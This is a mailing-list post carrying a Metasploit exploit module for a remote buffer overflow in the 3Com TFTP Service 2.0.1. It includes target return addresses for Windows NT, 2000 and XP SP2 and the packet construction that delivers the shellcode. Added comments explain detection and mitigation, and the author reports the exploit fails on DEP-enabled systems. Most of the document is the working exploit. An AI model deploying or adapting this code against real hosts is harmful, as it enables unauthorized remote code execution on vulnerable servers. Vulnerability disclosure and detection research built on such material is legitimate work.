Doesn't look like SEH is being overwritten so I'm having trouble getting this to work with DEP-enabled XPSP2 and 2K3. Tested on XPSP2 and Win2K. Includes offsets for NT, 2K and XP (call esi).

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

require 'msf/core'

module Msf

# Metasploit module for the 3Com TFTP Service 2.0.1 overflow (BID 21301).
#
# Transport is plain UDP (Exploit::Remote::Udp) to RPORT, default 69.
# Defender notes, grounded in the Description and #exploit below: the trigger
# is a single TFTP write request (opcode 2) whose mode ("type") field is
# hundreds of bytes long instead of one of the short RFC 1350 mode strings,
# and the service does not need write access enabled for the overflow to be
# reached -- so disabling writes is not a mitigation; patching/retiring the
# service or filtering UDP/69 is. The post above reports the module working
# only on non-DEP systems (XPSP2, Win2K).
class Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow < Msf::Exploit::Remote

  include Exploit::Remote::Udp

  # Registers the module's metadata and options with the framework.
  #
  # @param info [Hash] base module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      # NOTE(review): "Requesat" is a typo for "Request" in the module name.
      'Name'           => '3CTftpSvc Server 2.0.1 Long Requesat Buffer Overflow',
      'Description'    => %q{
          3Com TFTP Service version 2.0.1 suffers from a long type
          buffer overflow during a write TFTP request. Does not
          require write access to be enabled on the server.
          Attacker controls ESI. Liu Qixu of NCNIPC published
          this vulnerability.
      },
      # NOTE(review): the author string looks truncated in this copy (an
      # address presumably followed "[at]") -- verify against the original post.
      'Author'         => 'grutz [at]',
      # NOTE(review): '$$' is presumably a stripped revision keyword -- verify.
      'Version'        => '$$',
      'References'     =>
        [
          # NOTE(review): the URL is empty in this copy; the link appears to
          # have been stripped from the post.
          ['URL', ''],
          ['BID', '21301'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          # 440 bytes fits inside the 473-byte nop sled built in #exploit:
          # the payload is written in place at offset 9, so it ends at
          # offset 448 at the latest, before the return address at 477.
          'Space'           => 440,
          # NUL is the field terminator in the TFTP packet built in #exploit,
          # so it cannot appear inside the encoded payload.
          'BadChars'        => "\x00",
          # Framework-prepended ESP adjustment before the payload body runs.
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      # Each 'Ret' is a version-specific "call esi" address in ws2help
      # (per the inline comments); the Description states the attacker
      # controls ESI at the time of the call.
      'Targets'        =>
        [
          ['Windows 2000 All SP English', { 'Ret' => 0x750217ae } ],  # call esi ws2help
          ['Windows XP SP2 English',      { 'Ret' => 0x71aa1b22 } ],  # call esi ws2help
          ['Windows NT SP5/6 English',    { 'Ret' => 0x776a117e } ],  # call esi ws2help
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 27 2006'
    ))

    # TFTP's standard port; the only option this module adds.
    register_options(
      [
        Opt::RPORT(69)
      ], self)
  end

  # Sends one crafted write request over UDP and disconnects.
  #
  # Packet layout (482 bytes total), as built below:
  #   [0..1]     "\x00\x02"         TFTP opcode 2 (WRQ)
  #   [2]        one random letter  filename, chosen to avoid payload badchars
  #   [3]        "\x00"             filename terminator
  #   [4..476]   473 nops           oversized mode ("type") field; the encoded
  #                                 payload replaces bytes starting at offset 9,
  #                                 so it sits entirely inside this sled
  #   [477..480] target.ret (LE)    return address overwrite (pack 'V')
  #   [481]      "\x00"             mode terminator
  #
  # For detection: a WRQ on UDP/69 whose mode field is this long is never
  # legitimate traffic and is the signature of this request.
  #
  # @return [void]
  def exploit
    connect_udp

    # NOTE(review): the interpolation is empty in this copy; the original
    # presumably printed target.name -- verify against the source tree.
    print_status("Trying target #{}...")

    sploit = "\x00\x02" + Rex::Text.rand_text_english(1, payload_badchars) + "\x00" +
             make_nops(473) + [target.ret].pack('V') + "\x00"

    # In-place replacement of exactly payload.encoded.length bytes, so the
    # total packet length and the position of the return address are unchanged.
    sploit[9, payload.encoded.length] = payload.encoded

    udp_sock.put(sploit)

    disconnect_udp
  end

end
end

--
..:[ grutz at jingojango dot net ]:..
GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4
"There's just no amusing way to say, 'I have a CISSP'."
_______________________________________________
Full-Disclosure - We believe in it. Charter: Hosted and sponsored by Secunia -